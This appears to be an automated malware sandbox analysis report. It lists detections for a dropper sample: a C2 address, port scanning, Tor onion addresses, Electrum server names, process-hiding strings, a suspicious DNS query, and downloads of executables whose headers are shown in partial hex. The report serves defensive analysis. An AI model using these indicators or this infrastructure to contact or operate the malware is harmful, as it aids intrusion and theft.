Source: Malware configuration extractor	URLs: 5.42.65.0:29587

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 5.42.65.0 ports 2,5,29587,7,8,9

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Users\user\Desktop\i1crvbOZAP.exe

File created: 3txhawinMkO2CAFAcsaKTzSR.exe.0.dr

Found Tor onion address

Source: KUc3lCE6xAEEreIlM0ct4583.exe	String found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
Source: KUc3lCE6xAEEreIlM0ct4583.exe	String found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint
Source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000400000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2182590732.000000000C01A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://yeug3c6mnwocixwlotka4nwo3fjtfic65o4psmpxvrdul5q7dgjmsvad.onion
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2182590732.000000000C01A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://2pkktxkf3gnpcjh2bhi62arz2ieyjgxocb3jne3kc2nu2yvyxqq23nad.onion
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2182590732.000000000C01A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: 031b422732351e332f4620190820022d0bhttp://yeug3c6mnwocixwlotka4nwo3fjtfic65o4psmpxvrdul5q7dgjmsvad.onionhttp://yeug3c6mnwocixwlotka4nwo3fjtfic65o4psmpxvrdul5q7dgjmsvad.onionS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\TestAppS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80http://2pkktxkf3gnpcjh2bhi62arz2ieyjgxocb3jne3kc2nu2yvyxqq23nad.onionS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80SELECT Name FROM Win32_VideoControllerS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80c:\users\user\documents\simpleadobe\rmz4w55acoqkh9k459dvruga.exe"C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe" C:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.mscPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6SESSIONNAME=ConsoleUSERDOMAIN=user-PCwindir=C:\WindowsPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelTrustedInstaller
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2182590732.000000000C07C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://2pkktxkf3gnpcjh2bhi62arz2ieyjgxocb3jne3kc2nu2yvyxqq23nad.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.mscPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntel
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2182590732.000000000C07A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statstraffic.orghttp://2pkktxkf3gnpcjh2bhi62arz2ieyjgxocb3jne3kc2nu2yvyxqq23nad.onionCommonProgramW6432=C:\Program Files\Common FilesFPS_BROWSER_APP_PROFILE_STRING=Internet Explorer

Performs DNS queries to domains with low reputation

Source:

DNS query: d.392391234.xyz

Source: global traffic	TCP traffic: 192.168.2.4:49814 -> 5.42.65.117:50500
Source: global traffic	TCP traffic: 192.168.2.4:49815 -> 193.233.132.67:50500
Source: global traffic	TCP traffic: 192.168.2.4:49819 -> 5.42.65.0:29587

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 28 Mar 2024 08:14:58 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 28 Mar 2024 08:00:02 GMTETag: "47800-614b3e9132b65"Accept-Ranges: bytesContent-Length: 292864Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 67 dc 51 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 08 6e 00 00 00 00 00 06 3c 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 6f 00 00 04 00 00 db 16 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 60 01 00 50 00 00 00 00 20 6e 00 00 e6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 01 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 55 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 e5 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 6a 00 00 00 00 01 00 00 6c 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 cc a1 6c 00 00 70 01 00 00 3c 02 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 e6 00 00 00 20 6e 00 00 e6 00 00 00 92 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 28 Mar 2024 08:14:58 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Sun, 24 Mar 2024 15:56:04 GMTETag: "ab2000-6146a18211f22"Accept-Ranges: bytesContent-Length: 11214848Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 db 4c 00 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 80 00 00 00 2e ca 00 00 00 00 00 79 fc 01 01 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 a1 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 66 01 64 00 00 00 00 10 a1 01 58 2c 00 00 60 d8 a0 01 fc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 76 fb 00 28 00 00 00 20 d7 a0 01 38 01 00 00 00 00 00 00 00 00 00 00 00 10 f6 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e6 7e 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f0 1d 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 68 e9 c9 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 80 01 00 00 00 a0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 b0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 c0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 30 00 00 e3 34 2b 00 00 d0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 31 00 00 38 08 00 00 00 10 f6 00 00 0a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 32 00 00 5c e3 aa 00 00 20 f6 00 00 e4 aa 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 58 2c 00 00 00 10 a1 01 00 2e 00 00 00 f2 aa 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.0Date: Thu, 28 Mar 2024 08:14:58 GMTContent-Type: application/octet-streamContent-Length: 5655872Connection: keep-aliveContent-Description: File TransferContent-Disposition: attachment; filename=Retailer.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 ae 62 fd 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 22 00 d4 10 00 00 80 03 00 00 00 00 00 f5 3a 91 00 00 10 00 00 00 f0 10 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 98 00 00 04 00 00 b5 1b 57 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 5c f5 63 00 4a 00 00 00 fc c7 47 00 40 01 00 00 00 f0 97 00 1b 11 00 00 00 00 00 00 00 00 00 00 00 d0 55 00 40 7d 00 00 00 d0 97 00 ac 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 bf 97 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 42 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 d2 10 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d8 3c 02 00 00 f0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 48 00 00 00 30 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 b3 c2 bb 7b 90 2e 00 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 76 6d 70 c2 b3 c2 bb 04 07 00 00 00 20 42 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 b3 c2 bb 20 94 55 00 00 30 42 00 00 96 55 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 ac 1a 00 00 00 d0 97 00 00 1c 00 00 00 a2 55 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1b 11 00 00 00 f0 97 00 00 12 00 00 00 be 55 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 28 Mar 2024 08:14:58 GMTContent-Type: application/octet-streamContent-Length: 1945878Connection: keep-aliveContent-Description: File TransferContent-Disposition: attachment; filename=june.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YTsUVFM5EJWHQiYNHU%2FstVov3K6yFA5pAvb7Y7WF1f23Ypst2ka%2FxhYUde%2B24y%2BO%2FwB8dYVDm3UTlzVEbO8QovR1CuSJWSIBZ0M40Mr4ddafGCf%2BRL%2FE%2FFgXM%2B0atn2l1ABi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86b62b70fbc32064-IADalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 24 9b 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 